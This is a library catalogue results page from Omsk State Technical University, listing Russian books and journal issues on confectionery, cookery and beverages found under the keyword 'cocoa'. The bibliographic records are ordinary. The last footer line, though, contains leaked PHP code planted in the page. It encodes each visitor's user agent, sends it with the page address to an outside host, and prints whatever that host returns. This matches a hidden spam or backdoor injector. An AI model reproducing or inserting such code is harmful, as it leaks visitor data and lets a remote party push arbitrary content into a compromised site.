Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

130 пользователей


Зарегистрированных: 1 

Зимакова Виолетта Вячеславовна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Какао")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 27
1. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
2. 
Надеждин, Николай Яковлевич. История науки и техники [Текст] / Н. Я. Надеждин, 2006. - 621 с.
Ключевые слова 
ОГОНЬ -- КОЛЕСО -- ТКАЧЕСТВО -- МЕДЬ -- КОРАБЛИ -- БРОНЗА -- СТЕКЛО -- ПИРАМИДЫ -- ЖЕЛЕЗО -- ДЕНЬГИ -- ПЕРГАМЕНТ -- БУМАГА -- КОМПАС -- ОЧКИ -- КНИГОПЕЧАТАНИЕ -- КОПЕРНИК -- ТЕЛЕСКОП -- ГАЗЕТА -- МИКРОСКОП -- КАРАНДАШ -- ВЕЛОСИПЕД -- ТЕЛЕГРАФ -- ПЛАСТМАСС -- МЕТРОПОЛИТЕН -- ЭЛЕКТРОСТАНЦИЯ -- РАДИО -- КИНЕМАТОГРАФ -- МАГНИТОФОН -- ДИРИЖАБЛЬ -- ТЕЛЕВИДЕНИЕ -- АНТИБИОТИКИ -- АКВАЛАНГ -- РОБОТЫ -- ВИДЕОЗАПИСЬ -- ПЕРСОНАЛЬНЫЙ КОМПЬЮТЕР -- ИНТЕРНЕТ -- МОТОЦИКЛ -- АВТОМОБИЛЬ -- ПОДВОДНАЯ ЛОДКА -- АЛХИМИЯ -- ПАПИРУС -- НЬЮТОН -- ГАЛИЛЕЙ -- КОФЕ -- ЧАЙ -- КАКАО -- ПОРОХ -- ЛИННЕЙ -- ГРОМООТВОД -- СТЕФЕНСОН -- ДАРВИН -- ЭДИСОН -- ЭЙНШТЕЙН -- ФОРД
Держатели документа (Информация об экземплярах) 
3. 
Лурье И. С. Технология кондитерского производства [Текст] / И. С. Лурье, 1992. - 399 с.
Держатели документа (Информация об экземплярах) 
4. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
5. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Могильный, Михаил Петрович. Восточные сладости (технология, рецептура, рекомендации) [Текст] / М. П. Могильный ; дар. В. В. Арсеньев, 2002. - 147 с.
Держатели документа (Информация об экземплярах) 
7. 
Химия и жизнь - XXI век. - Журнал, 2010г. № 8
Оглавление 
  • Котина, Е. Все серые, карие, синие глазки... / Е. Котина, Л. Стрельникова. - с.2
  • Котина, Е. Жизнь и смерть в луже / Е. Котина, Л. Стрельникова. - с.2-3
  • Котина, Е. Пожиратели фенола / Е. Котина, Л. Стрельникова. - с.3
  • Левицкий, М. М. Покушение на абсолютные истины / М. М. Левицкий, Д. С. Перекалин. - с.4-7
  • Воробьева, А. В. Наноконтакт к нанотрубе / А. В. Воробьева. - с.8-11
  • Комаров, С. М. Клин клином / С. М. Комаров. - с.12
  • Комаров, С. М. Чтение ДНК сквозь графен / С. М. Комаров. - с.12
  • Комаров, С. М. Свечение расплавленной ДНК / С. М. Комаров. - с.12
  • Комаров, С. М. Поиск новых земель / С. М. Комаров. - с.12
  • Комаров, С. М. Поток фотонов / С. М. Комаров. - с.13
  • Комаров, С. М. Самоубийство опухоли / С. М. Комаров. - с.13
  • Комаров, С. М. Хлопок превращается... / С. М. Комаров. - с.13
  • Комаров, С. М. Навигатор ищет парковку / С. М. Комаров. - с.13
  • Фридман, В. С. Интеллект: среда или гены / В. С. Фридман, М. В. Фридман. - с.14-19
  • Кулькова, Н. В. Сирил Хиншельвуд: кинетика химии и жизни / Н. В. Кулькова, А. С. Садовский. - с.20-23
  • Ветров, И. Кондиционеры: прохлада не заменит свежесть / И. Ветров. - с.24-25
  • Котина, Е. Деревья, побитые молью / Е. Котина. - с.28-29
  • Анофелес, С. Про медицинские грибы / С. Анофелес. - с.30-35
  • Комаров, С. М. Квинтэссенция вешенки / С. М. Комаров. - с.35-37
  • Корнилов, М. Ю. Углеродные звезды / М. Ю. Корнилов. - с.38
  • Резник, Н. Л. Лучшие кофейные зерна / Н. Л. Резник. - с.40-43
  • Яшин, Я. И. Какао - пища богов / Я. И. Яшин. - с.44-45
  • Шубин, Н. Внутренняя рыба / Н. Шубин. - с.46-51
  • Стрельников, Е. Химия в "в расписании на завтра" / Е. Стрельников. - с.52-55
  • Тесленко, О. Переход / О. Тесленко. - с.58-61
  • Анофелес, С. Армия молодых негодяев / С. Анофелес. - с.62
  • Мотылев, А. Ледники Тибета не тают / А. Мотылев. - с.63
  • Демина, М. Чем болеют бронзовые памятники / М. Демина. - с.64-65
Держатели документа (Информация об экземплярах) 
8. 
Современная торговля. - Журнал, 2005г. № 6
Оглавление 
  • Федорова, Ю. Принять нельзя отклонить / Ю. Федорова, Е. Мясин. - с.13-15 : ил.
  • Проблемы сетей оптом и в розницу. - с.17-22 : ил.
  • Земля меняет градус. - с.23-24
  • Структура российского пивного рынка. - с.24-33 : ил.
    Кл. слова: Пивная этикетка, Текила
  • Вина, любимые до бешенства. - с.25-33
  • Россия тянется к здоровью. - с.34-41 : ил.
    Кл. слова: Рынок морепродуктов, Морепродукт, Морской деликатес
  • В Америке поиграют в роскошь. - с.52-53 : ил.
    Кл. слова: Сеть магазинов роскоши Neiman Marcus
  • Под крылом кукушки; особенности развития "русского" франчайзинга. - с.55-60 : ил.
  • Магазин "по-домашнему". - с.61-64 : ил.
  • Идеи - на заморозку. - с.65-83 : ил.
    Кл. слова: Устройство магазина, Планирование супермаркета
  • Бухгалтеры рискуют стать аутсайдерами. - с.84-86 : табл.
  • Не опоздай на "упрощенку". - с.87-88 : ил.
    Кл. слова: Упрощенная система налогообложения
  • Сколько литров разрешено на человека? Экономическая обоснованность глазами ФНС. - с.89-90
    Кл. слова: Статья 252 НК РФ
  • "Умная" упаковка. - с.91-96 : ил.
  • Нелегко быть рыжим. - с.97-101
    Кл. слова: Магазин "Рыжая тыква", Экомаркет, Экологически чистый продукт
  • Вся правда о полезных напитках. - с.35-37
    Кл. слова: Чай, Кофе, Какао
9. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
10. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
11. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
12. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
13. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

14. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.
15. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
16. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
17. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
18. 
Иванникова Е. И. Барное дело [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2004. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- БАР - МАРКЕТИНГ -- бар - реклама -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- боули -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
19. 
Драгилев А. И. Технология кондитерских изделий [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. И. Драгилев, И. С. Лурье, 2003. - 429 с.
Держатели документа (Информация об экземплярах) 
20. 
Иванникова Е. И. Барное дело [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2002. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- Напиток смешанный -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
21. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3026 - 22.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.16 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;